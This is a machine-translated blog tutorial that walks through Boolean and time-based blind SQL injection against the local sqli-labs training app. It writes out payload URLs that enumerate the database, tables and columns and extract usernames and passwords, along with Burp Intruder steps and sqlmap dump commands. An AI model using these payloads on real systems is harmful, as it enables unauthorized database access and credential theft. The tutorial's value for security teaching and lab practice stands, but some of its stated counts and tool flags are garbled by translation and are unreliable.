sql injection for web Security

Blind injection of sql injection

  • catalogue

  • Blind injection principle

  • Boolean blind note

  • Time blind injection

  • sqlmap blind injection

 

 

1, Blind injection principle


1. Blind injection application scenario

Blind injection is often used where there is no detailed echo when interacting with the database; Boolean blind injection is injected according to the normal / abnormal (right / wrong) of the page return value; Time blind injection is injected according to the delay time of sleep;

2. Analysis of blind note statements

Boolean blind note common statements: select id, username, password from users where id ='1 'and length (database()) = 8

 

 

 

 

What is important here is and; Because if and is true; You need left and right to be true. Therefore, when the right length(database())=x is true, the normal page will be returned; when the right length(database())=x is not true, the wrong page will be returned; Boolean blind injection is blind injection based on right / wrong

3. Blind injection source code analysis

View the source code of the eighth pass of sqli labs master

 

 

  mysql_quert function: execute a MySQL query

  mysql_fetch_array function: get a row from the result set as an associative array or a numeric array

You can see that the main thing is to pass in a get variable $ID, and then execute an sql statement: "SELECT * FROM users WHERE id='$id' LIMIT 0,1"

Then make if judgment; If there is echo in the sql statement, You are in; Output if there is no echo; That is, if the sql statement is correct, You are in; If the sql statement is wrong, nothing will be output;

4. Common functions of blind injection

length() queries the specified number of string characters

ascii()         Converts the specified character to ASCII code

mid(data,start,leng) intercepts a string of a specified length

sleep()           Delay time output

count()           Number of queries

if()             Conditional judgment statement

2, Boolean blind note

Target: the eighth pass of sqli labs master


1. Query injection point

?id=1' and 1=1-- -    correct;?id=1' and 1=2-- -    error

 

 

 

 

  2. Query database

(1) Query database name characters

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8-- -

The number of characters queried is 8

 

 

  (2) Query the first character of database name

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(mid(database(),1,1))=115-- -

 

  According to the ascii code, the first character is s

ascii comparison table—— ASCII code list, ASCII code comparison table (biancheng.net)

 

  The latter can directly use burp blasting

burp blasting steps:

1) Set up agent; Intercept packets

 

 

  2) Forward to introder (Shortcut Ctrl+l)

 

 

 

  3) Set blasting position (variable)

 

  4) Select payloads to configure the dictionary

First parameter

 

  Second parameter

 

 

  5) Blasting; Select the parameters found in the echo;

 

 

  Based on the location and ascii values, it is easy to conclude that the database name is security

3. Query data table

(1) Number of query data tables

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where 
table_schema='security')=4-- -

The number of subordinate tables in the security database is 5

 

 

  (2) Query the number of characters in the first table

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(table_name) from information_schema.tables where 
table_schema='security' limit 0,1)=6-- -

The number of characters in the first table is 6

(3) Query the first character of the first table

 

 

  Other characters are similar to changing the start bit of mid function; In other tables, the start bit of the limit function is changed similarly; The users table exists

4. Query field

(1) Query the number of users table fields

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where 
table_name='users' and table_schema='security')=3-- -

The query shows that there are three fields under the users table

 

  (2)   Number of characters to query the first field

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(column_name) from information_schema.columns 
where table_name='users' and table_schema='security' limit 0,1)=2-- -

It can be concluded that the number of fields in the first field is 2

 

  (3) Query the first character of the first field

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((column_name),1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105-- -

The first character of the first field is i

 

 

  Similarly; The second character is d; The second table is username; The third table is password

5. Query data

(1) Number of query data characters

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11-- -

The number of characters of the first (id~username~password) is 11

 

 

  (2) Query data character

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((concat(id,0x7e,username,0x7e,password)),1,1)) from users 
limit 0,1)=49-- -

  The first character number is 1

 

 

  The rest of the above examples can get all the data

 

3. Time blind injection

Target: sqli labs master 9th pass

The only difference between time blind injection and Boolean blind injection: Boolean blind injection judges right and wrong according to echo; Time blind injection judges right and wrong according to time delay

 

1. Query injection point

It is found that mysql has two features:

 

 

  As long as the query is a number, the first number mainly matches the database; And no number is added after it; Any other characters have no effect (for numeric indexes only)

It is found that no matter what value is entered in question 9, it returns a fixed value; Therefore, Boolean blind injection cannot be used; Only delayed blind injection can be used to judge the injection point

 

 

 ?id=1' and if(1=1,sleep(0),sleep(5))-- - When, the delay is short 2 s;?id=1' and if(1=2,sleep(0),sleep(5))-- - When, the delay is longer 7 s

There is an injection point and the symbol is closed‘

 

 

 

 

 

  2. Query database

(1) Query database characters

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(database()))=8,sleep(5),sleep(0))-- -

When equal to 8, the delay is long; So the number of database characters is 8

 

 

 

 

  (2) Query database first character

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(database(),1,1)))=115,sleep(5),sleep(0))-- -

 

  When the first character ascii code is 115, the delay is long; So the first character in the database is s

 

 

 

 

  Then, similarly, by changing the position of the start bit of the mid function, you can get the database name security

3. Query table

(1) Query the number of security tables

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where 
table_schema='security')=4,sleep(5),sleep(0))-- -

When the number of tables is 4, the delay is long; Therefore, there are four tables under the security database

 

 

 

 

 

(2) Query the number of characters in the first table

 

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where 
table_schema='security' limit 0,1)=6,sleep(5),sleep(0))-- -

 

When the number of characters is 6, the delay is long, so the number of characters in the first table is 6

 

 

 

(3) Query the first character of the first table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables 
where table_schema='security' limit 0,1)=101,sleep(5),sleep(0))-- -

When the first number ascii code is 101, the delay is long; So the first character of the first table is e

 

 

  After installing the above format query, you can find the table of users in one of the four tables

4. Query field

(1) Query the number of fields under the users table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where 
table_name='users' and table_schema='security')=3,sleep(5),sleep(0))-- -

Query that there are 5 fields under the users table

 

 

 

(2) Query the number of characters in the first field of the users table

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(column_name) from information_schema.columns 
where table_name='users' and table_schema='security' limit 0,1)=2,sleep(5),sleep(0))-- -

The number of characters in the first field is 2

 

 

 

 

 

(3) Query the first character of the first field

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(column_name,1,1)) from information_schema.columns 
where table_name='users' and table_schema='security' limit 0,1)=105,sleep(5),sleep(0))-- -

The first character of the first field is i

 

  All fields can be obtained from the above routine: id username password

5. Query data

(1) Number of data characters in the first column of query

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(concat(id,0x7e,username,0x7e,password)) from users 
limit 0,1)=11,sleep(5),sleep(0))-- -

 

Description the combination of id~username~password in the first column is 11 characters

 

 

 

  Query the first character of the first column

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(concat(id,0x7e,username,0x7e,password),1,1)) from users 
limit 0,1)=49,sleep(5),sleep(0))-- -

  The first character in the first column is 1

 

 

  All the characters in the first column are:   1~Dumb~Dumb

 

sqlmap tool blind injection


1. Common parameters of sqlmap

-u specify url

 

-p specifies the injection parameters

 

-D specifies the database name

 

-T specifies the table name

 

-C specifies the column name

 

--dbs       Query all database names

 

--Current DB queries the current database name

 

--Tables query all tables

 

--Columns queries all columns

 

--batch automation default operation

 

-r specifies the path to the package caught by burp (suitable for post; with cookie; authentication free)

 

--forms       Automatically identify that the post form parameters are suitable for URLs without login, or add cookie s manually

 

--Cookie specifies a cookie

--technique Q    Specify the injection method as inline query

 

--technique B    Specifies that the injection method is Boolean blind injection

--technique T      Specify the injection method as time blind injection

--technique U      Specify that the injection method is union query

2. sqlmap Boolean blind annotation

Target: sqli labs master 8th pass

Attacker: 127.0.0.1

(1) Query whether there is an injection point

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --batch

The id obtained from the query is an injectable point based on Boolean

 

 

 

 

 

  (2) Query current database name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch

 

  (3) Query table name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security --tables --batch

 


(4) Query field name

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users --columns --batch

  

 

  (5) Query data

sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users -C username --dump --batch

 

 

 

3. sqlmap time blind injection

 

Target: sqli labs master 9th pass

 

The time blind note is the same as the Boolean blind note, but you need to replace -- technology B with -- technology t

(1) Query whether there is an injection point

slightly

(2) Query database name

slightly

(3) Query table name

slightly

(4) Query field name

slightly

(5) Query data

sqlmap -u "127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T -D security -T users -C username --dump --batch

  

 

 

 

  Injection is too slow to wait; But long enough to inject success

 

Tags: Web Security

Posted on Sun, 28 Nov 2021 06:39:38 -0500 by MrRosary